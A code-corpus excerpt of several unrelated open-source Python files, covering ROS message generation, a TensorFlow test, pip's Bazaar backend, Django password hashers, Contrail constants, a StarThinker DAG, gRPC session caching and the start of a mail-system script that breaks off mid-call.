"spec": spec,
"md5sum": md5sum,
"search_path": search_path,
"msg_context": msg_context
}
if isinstance(spec, genmsg.msgs.MsgSpec):
g['msg_definition'] = msg_definition
# todo, reuse interpreter
interpreter = em.Interpreter(output=ofile, globals=g, options={em.RAW_OPT:True,em.BUFFERED_OPT:True})
if not os.path.isfile(template_file):
ofile.close()
os.remove(output_file)
raise RuntimeError("Template file %s not found in template dir %s" % (template_file_name, template_dir))
interpreter.file(open(template_file)) #todo try
interpreter.shutdown()
def _generate_msg_from_file(input_file, output_dir, template_dir, search_path, package_name, msg_template_dict):
# Read MsgSpec from .msg file
msg_context = genmsg.msg_loader.MsgContext.create_default()
full_type_name = genmsg.gentools.compute_full_type_name(package_name, os.path.basename(input_file))
spec = genmsg.msg_loader.load_msg_from_file(msg_context, input_file, full_type_name)
# Load the dependencies
genmsg.msg_loader.load_depends(msg_context, spec, search_path)
# Generate the language dependent msg file
_generate_from_spec(input_file,
output_dir,
template_dir,
msg_context,
spec,
msg_template_dict,
search_path)
def _generate_srv_from_file(input_file, output_dir, template_dir, search_path, package_name, srv_template_dict, msg_template_dict):
    # Read MsgSpec from .srv file
msg_context = genmsg.msg_loader.MsgContext.create_default()
full_type_name = genmsg.gentools.compute_full_type_name(package_name, os.path.basename(input_file))
spec = genmsg.msg_loader.load_srv_from_file(msg_context, input_file, full_type_name)
# Load the dependencies
genmsg.msg_loader.load_depends(msg_context, spec, search_path)
# Generate the language dependent srv file
_generate_from_spec(input_file,
output_dir,
template_dir,
msg_context,
spec,
srv_template_dict,
search_path)
# Generate the language dependent msg file for the srv request
_generate_from_spec(input_file,
output_dir,
template_dir,
msg_context,
spec.request,
msg_template_dict,
search_path)
# Generate the language dependent msg file for the srv response
_generate_from_spec(input_file,
output_dir,
template_dir,
msg_context,
spec.response,
msg_template_dict,
search_path)
# Uniform interface for generating either srv or msg files
def generate_from_file(input_file, package_name, output_dir, template_dir, include_path, msg_template_dict, srv_template_dict):
# Normalize paths
input_file = os.path.abspath(input_file)
output_dir = os.path.abspath(output_dir)
# Create output dir
try:
os.makedirs(output_dir)
except OSError as e:
if e.errno != 17: # ignore file exists error
raise
# Parse include path dictionary
if( include_path ):
search_path = genmsg.command_line.includepath_to_dict(include_path)
else:
search_path = {}
# Generate the file(s)
if input_file.endswith(".msg"):
_generate_msg_from_file(input_file, output_dir, template_dir, search_path, package_name, msg_template_dict)
elif input_file.endswith(".srv"):
_generate_srv_from_file(input_file, output_dir, template_dir, search_path, package_name, srv_template_dict, msg_template_dict)
else:
assert False, "Uknown file extension for %s"%input_file
def generate_module(package_name, output_dir, template_dir, template_dict):
# Locate generate msg files
files = os.listdir(output_dir)
# Loop over all files to generate
for template_file_name, output_file_name in template_dict.items():
template_file = os.path.join(template_dir, template_file_name)
output_file = os.path.join(output_dir, output_file_name)
ofile = open(output_file, 'w') #todo try
        # Set dictionary for the generator interpreter
g = dict(files=files,
package=package_name)
# todo, reuse interpreter
interpreter = em.Interpreter(output=ofile, options={em.RAW_OPT:True,em.BUFFERED_OPT:True})
interpreter.updateGlobals(g)
if not os.path.isfile(template_file):
ofile.close()
os.remove(output_file)
raise RuntimeError("Template file %s not found in template dir %s" % (template_file_name, template_dir))
interpreter.file(open(template_file)) #todo try
interpreter.shutdown()
# Uniform interface to support the standard command line options
def generate_from_command_line_options(argv, msg_template_dict, srv_template_dict, module_template_dict = {}):
from optparse import OptionParser
parser = OptionParser("[options] <srv file>")
parser.add_option("-p", dest='package',
help="ros package the generated msg/srv files belongs to")
parser.add_option("-o", dest='outdir',
help="directory in which to place output files")
parser.add_option("-I", dest='includepath',
help="include path to search for messages",
action="append")
parser.add_option("-m", dest='module',
help="write the module file",
action='store_true', default=False)
parser.add_option("-e", dest='emdir',
help="directory containing template files",
default=sys.path[0])
(options, argv) = parser.parse_args(argv)
if( not options.package or not options.outdir or not options.emdir):
parser.print_help()
exit(-1)
if( options.module ):
generate_module(options.package, options.outdir, options.emdir, module_template_dict)
else:
if len(argv) > 1:
generate_from_file(argv[1], options.package, options.outdir, options.emdir, options.includepath, msg_template_dict, srv_template_dict)
else:
parser.print_help()
exit(-1)
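# A hedged sketch of how a language-specific generator script might drive this
# module (the template file names are illustrative, not shipped templates):
#
#   import sys
#   from genmsg.template_tools import generate_from_command_line_options
#
#   msg_templates = {'msg.h.template': '@NAME@.h'}
#   srv_templates = {'srv.h.template': '@NAME@.h'}
#
#   if __name__ == '__main__':
#       generate_from_command_line_options(sys.argv, msg_templates, srv_templates)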
|
gpl-3.0
|
ville-k/tensorflow
|
tensorflow/python/kernel_tests/string_join_op_test.py
|
134
|
1896
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for string_join_op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.ops import string_ops
from tensorflow.python.platform import test
class StringJoinOpTest(test.TestCase):
def testStringJoin(self):
input0 = ["a", "b"]
input1 = "a"
input2 = [["b"], ["c"]]
with self.test_session():
output = string_ops.string_join([input0, input1])
self.assertAllEqual(output.eval(), [b"aa", b"ba"])
output = string_ops.string_join([input0, input1], separator="--")
self.assertAllEqual(output.eval(), [b"a--a", b"b--a"])
output = string_ops.string_join([input0, input1, input0], separator="--")
self.assertAllEqual(output.eval(), [b"a--a--a", b"b--a--b"])
output = string_ops.string_join([input1] * 4, separator="!")
self.assertEqual(output.eval(), b"a!a!a!a")
output = string_ops.string_join([input2] * 2, separator="")
self.assertAllEqual(output.eval(), [[b"bb"], [b"cc"]])
with self.assertRaises(ValueError): # Inconsistent shapes
string_ops.string_join([input0, input2]).eval()
if __name__ == "__main__":
test.main()
|
apache-2.0
|
brandonium21/snowflake
|
snowflakeEnv/lib/python2.7/site-packages/pip/vcs/bazaar.py
|
280
|
4427
|
from __future__ import absolute_import
import logging
import os
import tempfile
import re
# TODO: Get this into six.moves.urllib.parse
try:
from urllib import parse as urllib_parse
except ImportError:
import urlparse as urllib_parse
from pip.utils import rmtree, display_path
from pip.vcs import vcs, VersionControl
from pip.download import path_to_url
logger = logging.getLogger(__name__)
class Bazaar(VersionControl):
name = 'bzr'
dirname = '.bzr'
repo_name = 'branch'
schemes = (
'bzr', 'bzr+http', 'bzr+https', 'bzr+ssh', 'bzr+sftp', 'bzr+ftp',
'bzr+lp',
)
def __init__(self, url=None, *args, **kwargs):
super(Bazaar, self).__init__(url, *args, **kwargs)
# Python >= 2.7.4, 3.3 doesn't have uses_fragment or non_hierarchical
# Register lp but do not expose as a scheme to support bzr+lp.
if getattr(urllib_parse, 'uses_fragment', None):
urllib_parse.uses_fragment.extend(['lp'])
urllib_parse.non_hierarchical.extend(['lp'])
def export(self, location):
"""
Export the Bazaar repository at the url to the destination location
"""
temp_dir = tempfile.mkdtemp('-export', 'pip-')
self.unpack(temp_dir)
if os.path.exists(location):
# Remove the location to make sure Bazaar can export it correctly
rmtree(location)
try:
self.run_command(['export', location], cwd=temp_dir,
show_stdout=False)
finally:
rmtree(temp_dir)
def switch(self, dest, url, rev_options):
self.run_command(['switch', url], cwd=dest)
def update(self, dest, rev_options):
self.run_command(['pull', '-q'] + rev_options, cwd=dest)
def obtain(self, dest):
url, rev = self.get_url_rev()
if rev:
rev_options = ['-r', rev]
rev_display = ' (to revision %s)' % rev
else:
rev_options = []
rev_display = ''
if self.check_destination(dest, url, rev_options, rev_display):
logger.info(
'Checking out %s%s to %s',
url,
rev_display,
display_path(dest),
)
self.run_command(['branch', '-q'] + rev_options + [url, dest])
def get_url_rev(self):
        # hotfix the URL scheme after removing bzr+ from bzr+ssh://; re-add it
url, rev = super(Bazaar, self).get_url_rev()
if url.startswith('ssh://'):
url = 'bzr+' + url
return url, rev
def get_url(self, location):
urls = self.run_command(['info'], show_stdout=False, cwd=location)
for line in urls.splitlines():
line = line.strip()
for x in ('checkout of branch: ',
'parent branch: '):
if line.startswith(x):
repo = line.split(x)[1]
if self._is_local_repository(repo):
return path_to_url(repo)
return repo
return None
def get_revision(self, location):
revision = self.run_command(
['revno'], show_stdout=False, cwd=location)
return revision.splitlines()[-1]
def get_tag_revs(self, location):
tags = self.run_command(
['tags'], show_stdout=False, cwd=location)
tag_revs = []
for line in tags.splitlines():
tags_match = re.search(r'([.\w-]+)\s*(.*)$', line)
if tags_match:
tag = tags_match.group(1)
rev = tags_match.group(2)
tag_revs.append((rev.strip(), tag.strip()))
return dict(tag_revs)
def get_src_requirement(self, dist, location, find_tags):
repo = self.get_url(location)
if not repo:
return None
if not repo.lower().startswith('bzr:'):
repo = 'bzr+' + repo
egg_project_name = dist.egg_name().split('-', 1)[0]
current_rev = self.get_revision(location)
tag_revs = self.get_tag_revs(location)
if current_rev in tag_revs:
# It's a tag
full_egg_name = '%s-%s' % (egg_project_name, tag_revs[current_rev])
else:
full_egg_name = '%s-dev_r%s' % (dist.egg_name(), current_rev)
return '%s@%s#egg=%s' % (repo, current_rev, full_egg_name)
vcs.register(Bazaar)
|
bsd-2-clause
|
etuna-SBF-kog/Stadsparken
|
env/lib/python2.7/site-packages/django/contrib/auth/hashers.py
|
2
|
15500
|
import functools
import hashlib
from django.conf import settings
from django.utils import importlib
from django.utils.datastructures import SortedDict
from django.utils.encoding import smart_str
from django.core.exceptions import ImproperlyConfigured
from django.utils.crypto import (
pbkdf2, constant_time_compare, get_random_string)
from django.utils.translation import ugettext_noop as _
UNUSABLE_PASSWORD = '!' # This will never be a valid encoded hash
MAXIMUM_PASSWORD_LENGTH = 4096 # The maximum length a password can be to prevent DoS
HASHERS = None # lazily loaded from PASSWORD_HASHERS
PREFERRED_HASHER = None # defaults to first item in PASSWORD_HASHERS
def password_max_length(max_length):
def inner(fn):
@functools.wraps(fn)
def wrapper(self, password, *args, **kwargs):
if len(password) > max_length:
raise ValueError("Invalid password; Must be less than or equal"
" to %d bytes" % max_length)
return fn(self, password, *args, **kwargs)
return wrapper
return inner
def is_password_usable(encoded):
return (encoded is not None and encoded != UNUSABLE_PASSWORD)
def check_password(password, encoded, setter=None, preferred='default'):
"""
Returns a boolean of whether the raw password matches the three
part encoded digest.
If setter is specified, it'll be called when you need to
regenerate the password.
"""
if not password or not is_password_usable(encoded):
return False
preferred = get_hasher(preferred)
raw_password = password
password = smart_str(password)
encoded = smart_str(encoded)
# Ancient versions of Django created plain MD5 passwords and accepted
# MD5 passwords with an empty salt.
if ((len(encoded) == 32 and '$' not in encoded) or
(len(encoded) == 37 and encoded.startswith('md5$$'))):
hasher = get_hasher('unsalted_md5')
# Ancient versions of Django accepted SHA1 passwords with an empty salt.
elif len(encoded) == 46 and encoded.startswith('sha1$$'):
hasher = get_hasher('unsalted_sha1')
else:
algorithm = encoded.split('$', 1)[0]
hasher = get_hasher(algorithm)
must_update = hasher.algorithm != preferred.algorithm
is_correct = hasher.verify(password, encoded)
if setter and is_correct and must_update:
setter(raw_password)
return is_correct
def make_password(password, salt=None, hasher='default'):
"""
Turn a plain-text password into a hash for database storage
Same as encode() but generates a new random salt. If
password is None or blank then UNUSABLE_PASSWORD will be
returned which disallows logins.
"""
if not password:
return UNUSABLE_PASSWORD
hasher = get_hasher(hasher)
password = smart_str(password)
if not salt:
salt = hasher.salt()
salt = smart_str(salt)
return hasher.encode(password, salt)
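# Example of the round trip provided by make_password()/check_password() above
# (the plain-text value is illustrative):
#
#   encoded = make_password('s3cret')      # e.g. 'pbkdf2_sha256$10000$<salt>$<hash>'
#   check_password('s3cret', encoded)      # True
#   check_password('wrong', encoded)       # False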
def load_hashers(password_hashers=None):
global HASHERS
global PREFERRED_HASHER
hashers = []
if not password_hashers:
password_hashers = settings.PASSWORD_HASHERS
for backend in password_hashers:
try:
mod_path, cls_name = backend.rsplit('.', 1)
mod = importlib.import_module(mod_path)
hasher_cls = getattr(mod, cls_name)
except (AttributeError, ImportError, ValueError):
raise ImproperlyConfigured("hasher not found: %s" % backend)
hasher = hasher_cls()
if not getattr(hasher, 'algorithm'):
raise ImproperlyConfigured("hasher doesn't specify an "
"algorithm name: %s" % backend)
hashers.append(hasher)
HASHERS = dict([(hasher.algorithm, hasher) for hasher in hashers])
PREFERRED_HASHER = hashers[0]
def get_hasher(algorithm='default'):
"""
Returns an instance of a loaded password hasher.
If algorithm is 'default', the default hasher will be returned.
This function will also lazy import hashers specified in your
settings file if needed.
"""
if hasattr(algorithm, 'algorithm'):
return algorithm
elif algorithm == 'default':
if PREFERRED_HASHER is None:
load_hashers()
return PREFERRED_HASHER
else:
if HASHERS is None:
load_hashers()
if algorithm not in HASHERS:
raise ValueError("Unknown password hashing algorithm '%s'. "
"Did you specify it in the PASSWORD_HASHERS "
"setting?" % algorithm)
return HASHERS[algorithm]
def mask_hash(hash, show=6, char="*"):
"""
Returns the given hash, with only the first ``show`` number shown. The
rest are masked with ``char`` for security reasons.
"""
masked = hash[:show]
masked += char * len(hash[show:])
return masked
class BasePasswordHasher(object):
"""
Abstract base class for password hashers
When creating your own hasher, you need to override algorithm,
verify(), encode() and safe_summary().
PasswordHasher objects are immutable.
"""
algorithm = None
library = None
def _load_library(self):
if self.library is not None:
if isinstance(self.library, (tuple, list)):
name, mod_path = self.library
else:
name = mod_path = self.library
try:
module = importlib.import_module(mod_path)
except ImportError:
raise ValueError("Couldn't load %s password algorithm "
"library" % name)
return module
raise ValueError("Hasher '%s' doesn't specify a library attribute" %
self.__class__)
def salt(self):
"""
Generates a cryptographically secure nonce salt in ascii
"""
return get_random_string()
def verify(self, password, encoded):
"""
Checks if the given password is correct
"""
raise NotImplementedError()
def encode(self, password, salt):
"""
Creates an encoded database value
The result is normally formatted as "algorithm$salt$hash" and
must be fewer than 128 characters.
"""
raise NotImplementedError()
def safe_summary(self, encoded):
"""
Returns a summary of safe values
The result is a dictionary and will be used where the password field
must be displayed to construct a safe representation of the password.
"""
raise NotImplementedError()
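# A custom hasher built on the contract above is enabled by listing its dotted
# path first in the PASSWORD_HASHERS setting; the module path below is
# illustrative, not part of Django:
#
#   PASSWORD_HASHERS = (
#       'myproject.hashers.MyPasswordHasher',
#       'django.contrib.auth.hashers.PBKDF2PasswordHasher',
#       # ... the remaining default hashers ...
#   )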
class PBKDF2PasswordHasher(BasePasswordHasher):
"""
Secure password hashing using the PBKDF2 algorithm (recommended)
Configured to use PBKDF2 + HMAC + SHA256 with 10000 iterations.
The result is a 64 byte binary string. Iterations may be changed
safely but you must rename the algorithm if you change SHA256.
"""
algorithm = "pbkdf2_sha256"
iterations = 10000
digest = hashlib.sha256
@password_max_length(MAXIMUM_PASSWORD_LENGTH)
def encode(self, password, salt, iterations=None):
assert password
assert salt and '$' not in salt
if not iterations:
iterations = self.iterations
hash = pbkdf2(password, salt, iterations, digest=self.digest)
hash = hash.encode('base64').strip()
return "%s$%d$%s$%s" % (self.algorithm, iterations, salt, hash)
@password_max_length(MAXIMUM_PASSWORD_LENGTH)
def verify(self, password, encoded):
algorithm, iterations, salt, hash = encoded.split('$', 3)
assert algorithm == self.algorithm
encoded_2 = self.encode(password, salt, int(iterations))
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
algorithm, iterations, salt, hash = encoded.split('$', 3)
assert algorithm == self.algorithm
return SortedDict([
(_('algorithm'), algorithm),
(_('iterations'), iterations),
(_('salt'), mask_hash(salt)),
(_('hash'), mask_hash(hash)),
])
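# As the docstring notes, the work factor can be raised safely by subclassing,
# because the iteration count is stored in each encoded password (the class name
# and count below are illustrative):
#
#   class StrongerPBKDF2PasswordHasher(PBKDF2PasswordHasher):
#       iterations = 20000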
class PBKDF2SHA1PasswordHasher(PBKDF2PasswordHasher):
"""
Alternate PBKDF2 hasher which uses SHA1, the default PRF
recommended by PKCS #5. This is compatible with other
implementations of PBKDF2, such as openssl's
PKCS5_PBKDF2_HMAC_SHA1().
"""
algorithm = "pbkdf2_sha1"
digest = hashlib.sha1
class BCryptPasswordHasher(BasePasswordHasher):
"""
Secure password hashing using the bcrypt algorithm (recommended)
This is considered by many to be the most secure algorithm but you
must first install the py-bcrypt library. Please be warned that
this library depends on native C code and might cause portability
issues.
"""
algorithm = "bcrypt"
library = ("py-bcrypt", "bcrypt")
rounds = 12
def salt(self):
bcrypt = self._load_library()
return bcrypt.gensalt(self.rounds)
@password_max_length(MAXIMUM_PASSWORD_LENGTH)
def encode(self, password, salt):
bcrypt = self._load_library()
data = bcrypt.hashpw(password, salt)
return "%s$%s" % (self.algorithm, data)
@password_max_length(MAXIMUM_PASSWORD_LENGTH)
def verify(self, password, encoded):
algorithm, data = encoded.split('$', 1)
assert algorithm == self.algorithm
bcrypt = self._load_library()
return constant_time_compare(data, bcrypt.hashpw(password, data))
def safe_summary(self, encoded):
algorithm, empty, algostr, work_factor, data = encoded.split('$', 4)
assert algorithm == self.algorithm
salt, checksum = data[:22], data[22:]
return SortedDict([
(_('algorithm'), algorithm),
(_('work factor'), work_factor),
(_('salt'), mask_hash(salt)),
(_('checksum'), mask_hash(checksum)),
])
class SHA1PasswordHasher(BasePasswordHasher):
"""
The SHA1 password hashing algorithm (not recommended)
"""
algorithm = "sha1"
@password_max_length(MAXIMUM_PASSWORD_LENGTH)
def encode(self, password, salt):
assert password
assert salt and '$' not in salt
hash = hashlib.sha1(salt + password).hexdigest()
return "%s$%s$%s" % (self.algorithm, salt, hash)
@password_max_length(MAXIMUM_PASSWORD_LENGTH)
def verify(self, password, encoded):
algorithm, salt, hash = encoded.split('$', 2)
assert algorithm == self.algorithm
encoded_2 = self.encode(password, salt)
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
algorithm, salt, hash = encoded.split('$', 2)
assert algorithm == self.algorithm
return SortedDict([
(_('algorithm'), algorithm),
(_('salt'), mask_hash(salt, show=2)),
(_('hash'), mask_hash(hash)),
])
class MD5PasswordHasher(BasePasswordHasher):
"""
The Salted MD5 password hashing algorithm (not recommended)
"""
algorithm = "md5"
@password_max_length(MAXIMUM_PASSWORD_LENGTH)
def encode(self, password, salt):
assert password
assert salt and '$' not in salt
hash = hashlib.md5(salt + password).hexdigest()
return "%s$%s$%s" % (self.algorithm, salt, hash)
@password_max_length(MAXIMUM_PASSWORD_LENGTH)
def verify(self, password, encoded):
algorithm, salt, hash = encoded.split('$', 2)
assert algorithm == self.algorithm
encoded_2 = self.encode(password, salt)
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
algorithm, salt, hash = encoded.split('$', 2)
assert algorithm == self.algorithm
return SortedDict([
(_('algorithm'), algorithm),
(_('salt'), mask_hash(salt, show=2)),
(_('hash'), mask_hash(hash)),
])
class UnsaltedSHA1PasswordHasher(BasePasswordHasher):
"""
Very insecure algorithm that you should *never* use; stores SHA1 hashes
with an empty salt.
This class is implemented because Django used to accept such password
hashes. Some older Django installs still have these values lingering
around so we need to handle and upgrade them properly.
"""
algorithm = "unsalted_sha1"
def salt(self):
return ''
@password_max_length(MAXIMUM_PASSWORD_LENGTH)
def encode(self, password, salt):
assert salt == ''
hash = hashlib.sha1(password).hexdigest()
return 'sha1$$%s' % hash
@password_max_length(MAXIMUM_PASSWORD_LENGTH)
def verify(self, password, encoded):
encoded_2 = self.encode(password, '')
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
assert encoded.startswith('sha1$$')
hash = encoded[6:]
return SortedDict([
(_('algorithm'), self.algorithm),
(_('hash'), mask_hash(hash)),
])
class UnsaltedMD5PasswordHasher(BasePasswordHasher):
"""
Incredibly insecure algorithm that you should *never* use; stores unsalted
MD5 hashes without the algorithm prefix, also accepts MD5 hashes with an
empty salt.
This class is implemented because Django used to store passwords this way
and to accept such password hashes. Some older Django installs still have
these values lingering around so we need to handle and upgrade them
properly.
"""
algorithm = "unsalted_md5"
def salt(self):
return ''
@password_max_length(MAXIMUM_PASSWORD_LENGTH)
def encode(self, password, salt):
assert salt == ''
return hashlib.md5(password).hexdigest()
@password_max_length(MAXIMUM_PASSWORD_LENGTH)
def verify(self, password, encoded):
if len(encoded) == 37 and encoded.startswith('md5$$'):
encoded = encoded[5:]
encoded_2 = self.encode(password, '')
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
return SortedDict([
(_('algorithm'), self.algorithm),
(_('hash'), mask_hash(encoded, show=3)),
])
class CryptPasswordHasher(BasePasswordHasher):
"""
Password hashing using UNIX crypt (not recommended)
The crypt module is not supported on all platforms.
"""
algorithm = "crypt"
library = "crypt"
def salt(self):
return get_random_string(2)
@password_max_length(MAXIMUM_PASSWORD_LENGTH)
def encode(self, password, salt):
crypt = self._load_library()
assert len(salt) == 2
data = crypt.crypt(password, salt)
# we don't need to store the salt, but Django used to do this
return "%s$%s$%s" % (self.algorithm, '', data)
@password_max_length(MAXIMUM_PASSWORD_LENGTH)
def verify(self, password, encoded):
crypt = self._load_library()
algorithm, salt, data = encoded.split('$', 2)
assert algorithm == self.algorithm
return constant_time_compare(data, crypt.crypt(password, data))
def safe_summary(self, encoded):
algorithm, salt, data = encoded.split('$', 2)
assert algorithm == self.algorithm
return SortedDict([
(_('algorithm'), algorithm),
(_('salt'), salt),
(_('hash'), mask_hash(data, show=3)),
])
|
gpl-3.0
|
srajag/contrail-controller
|
src/config/common/svc_info.py
|
9
|
2236
|
#
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
_MGMT_STR = "management"
_LEFT_STR = "left"
_RIGHT_STR = "right"
_SVC_VN_MGMT = "svc-vn-mgmt"
_SVC_VN_LEFT = "svc-vn-left"
_SVC_VN_RIGHT = "svc-vn-right"
_VN_MGMT_SUBNET_CIDR = '10.250.1.0/24'
_VN_LEFT_SUBNET_CIDR = '10.250.2.0/24'
_VN_RIGHT_SUBNET_CIDR = '10.250.3.0/24'
_VN_SNAT_PREFIX_NAME = 'snat-si-left'
_VN_SNAT_SUBNET_CIDR = '100.64.0.0/29'
_CHECK_SVC_VM_HEALTH_INTERVAL = 30
_VM_INSTANCE_TYPE = 'virtual-machine'
_NETNS_INSTANCE_TYPE = 'network-namespace'
_SNAT_SVC_TYPE = 'source-nat'
_LB_SVC_TYPE = 'loadbalancer'
_ACTIVE_LOCAL_PREFERENCE = 200
_STANDBY_LOCAL_PREFERENCE = 100
# Minimum vrouter agent version that can manage service instances
_VROUTER_NETNS_SUPPORTED_VERSION = '1.10'
def get_management_if_str():
return _MGMT_STR
def get_left_if_str():
return _LEFT_STR
def get_right_if_str():
return _RIGHT_STR
def get_if_str_list():
if_str_list = []
if_str_list.append(get_management_if_str())
if_str_list.append(get_left_if_str())
if_str_list.append(get_right_if_str())
return if_str_list
def get_management_vn_name():
return _SVC_VN_MGMT
def get_left_vn_name():
return _SVC_VN_LEFT
def get_right_vn_name():
return _SVC_VN_RIGHT
def get_shared_vn_list():
shared_vn_list = []
shared_vn_list.append(get_management_vn_name())
shared_vn_list.append(get_left_vn_name())
shared_vn_list.append(get_right_vn_name())
return shared_vn_list
def get_management_vn_subnet():
return _VN_MGMT_SUBNET_CIDR
def get_left_vn_subnet():
return _VN_LEFT_SUBNET_CIDR
def get_right_vn_subnet():
return _VN_RIGHT_SUBNET_CIDR
def get_snat_left_vn_prefix():
return _VN_SNAT_PREFIX_NAME
def get_snat_left_subnet():
return _VN_SNAT_SUBNET_CIDR
def get_vm_instance_type():
return _VM_INSTANCE_TYPE
def get_netns_instance_type():
return _NETNS_INSTANCE_TYPE
def get_snat_service_type():
return _SNAT_SVC_TYPE
def get_lb_service_type():
return _LB_SVC_TYPE
def get_vm_health_interval():
return _CHECK_SVC_VM_HEALTH_INTERVAL
def get_active_preference():
return _ACTIVE_LOCAL_PREFERENCE
def get_standby_preference():
return _STANDBY_LOCAL_PREFERENCE
|
apache-2.0
|
google/starthinker
|
dags/sheets_copy_dag.py
|
1
|
4462
|
###########################################################################
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
'''
--------------------------------------------------------------
Before running this Airflow module...
Install StarThinker in cloud composer ( recommended ):
From Release: pip install starthinker
From Open Source: pip install git+https://github.com/google/starthinker
Or push local code to the cloud composer plugins directory ( if pushing local code changes ):
source install/deploy.sh
4) Composer Menu
l) Install All
--------------------------------------------------------------
If any recipe task has "auth" set to "user" add user credentials:
1. Ensure RECIPE['setup']['auth']['user'] = [User Credentials JSON]
OR
1. Visit Airflow UI > Admin > Connections.
2. Add an Entry called "starthinker_user", fill in the following fields. Last step paste JSON from authentication.
- Conn Type: Google Cloud Platform
- Project: Get from https://github.com/google/starthinker/blob/master/tutorials/cloud_project.md
- Keyfile JSON: Get from: https://github.com/google/starthinker/blob/master/tutorials/deploy_commandline.md#optional-setup-user-credentials
--------------------------------------------------------------
If any recipe task has "auth" set to "service" add service credentials:
1. Ensure RECIPE['setup']['auth']['service'] = [Service Credentials JSON]
OR
1. Visit Airflow UI > Admin > Connections.
2. Add an Entry called "starthinker_service", fill in the following fields. Last step paste JSON from authentication.
- Conn Type: Google Cloud Platform
- Project: Get from https://github.com/google/starthinker/blob/master/tutorials/cloud_project.md
- Keyfile JSON: Get from: https://github.com/google/starthinker/blob/master/tutorials/cloud_service.md
--------------------------------------------------------------
Sheet Copy
Copy tab from a sheet to a sheet.
- Provide the full edit URL for both sheets.
- Provide the tab name for both sheets.
- The tab will only be copied if it does not already exist.
--------------------------------------------------------------
This StarThinker DAG can be extended with any additional tasks from the following sources:
- https://google.github.io/starthinker/
- https://github.com/google/starthinker/tree/master/dags
'''
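# If credentials are supplied directly in code rather than via Airflow connections,
# the instructions above amount to something like the following (the value is a
# placeholder for real credentials JSON):
#
#   RECIPE.setdefault('setup', {}).setdefault('auth', {})['user'] = '{...user credentials JSON...}'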
from starthinker.airflow.factory import DAG_Factory
INPUTS = {
'auth_read': 'user', # Credentials used for reading data.
'from_sheet': '',
'from_tab': '',
'to_sheet': '',
'to_tab': '',
}
RECIPE = {
'tasks': [
{
'sheets': {
'auth': {
'field': {
'name': 'auth_read',
'kind': 'authentication',
'order': 1,
'default': 'user',
'description': 'Credentials used for reading data.'
}
},
'template': {
'sheet': {
'field': {
'name': 'from_sheet',
'kind': 'string',
'order': 1,
'default': ''
}
},
'tab': {
'field': {
'name': 'from_tab',
'kind': 'string',
'order': 2,
'default': ''
}
}
},
'sheet': {
'field': {
'name': 'to_sheet',
'kind': 'string',
'order': 3,
'default': ''
}
},
'tab': {
'field': {
'name': 'to_tab',
'kind': 'string',
'order': 4,
'default': ''
}
}
}
}
]
}
dag_maker = DAG_Factory('sheets_copy', RECIPE, INPUTS)
dag = dag_maker.generate()
if __name__ == "__main__":
dag_maker.print_commandline()
|
apache-2.0
|
jtattermusch/grpc
|
src/python/grpcio/grpc/experimental/session_cache.py
|
27
|
1533
|
# Copyright 2018 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""gRPC's APIs for TLS Session Resumption support"""
from grpc._cython import cygrpc as _cygrpc
def ssl_session_cache_lru(capacity):
"""Creates an SSLSessionCache with LRU replacement policy
Args:
capacity: Size of the cache
Returns:
An SSLSessionCache with LRU replacement policy that can be passed as a value for
the grpc.ssl_session_cache option to a grpc.Channel. SSL session caches are used
to store session tickets, which clients can present to resume previous TLS sessions
with a server.
"""
return SSLSessionCache(_cygrpc.SSLSessionCacheLRU(capacity))
class SSLSessionCache(object):
"""An encapsulation of a session cache used for TLS session resumption.
Instances of this class can be passed to a Channel as values for the
grpc.ssl_session_cache option
"""
def __init__(self, cache):
self._cache = cache
def __int__(self):
return int(self._cache)
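# A hedged usage sketch of the cache described above; the target address and
# channel credentials are placeholders, and the cache object is passed as the
# value of the grpc.ssl_session_cache channel option per the docstrings:
#
#   import grpc
#   from grpc.experimental import session_cache
#
#   cache = session_cache.ssl_session_cache_lru(1024)
#   channel = grpc.secure_channel('example.com:443', channel_credentials,
#                                 options=[('grpc.ssl_session_cache', cache)])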
|
apache-2.0
|
jstoja/TsinghuaMailSystem
|
src/com/mailsystem/__main__.py
|
1
|
1654
|
#!/usr/bin/env python
# coding: utf-8
import sys
import json
import argparse
from bottle import run
import src.com.mailsystem.api.routes as api
import src.com.mailsystem.codes as codes
from src.com.mailsystem.orm.Database import Database
from src.com.mailsystem.populate import populate_db
def read_config(setup_file):
try:
with open(setup_file) as f:
setup = json.load(f)
except Exception as e:
        print(
            "Can't process setup file '{}': {}".format(setup_file, e)
        )
sys.exit(1)
return setup
def connect_dbs(setup):
databases = {}
databases['users'] = Database(
'thumailusers',
setup['users']['uri']
)
for db in setup['departments']:
infos = setup['departments'][db]
if db not in databases:
databases[db] = Database(
db,
infos['uri']
)
return databases
if __name__ == '__main__':
parser = argparse.ArgumentParser("thumail")
parser.add_argument(
'--setup', default='setup.json',
help="A JSON file with DB's configuration (defaults to setup.json)"
)
parser.add_argument(
'--populate', action='store_true', default=False,
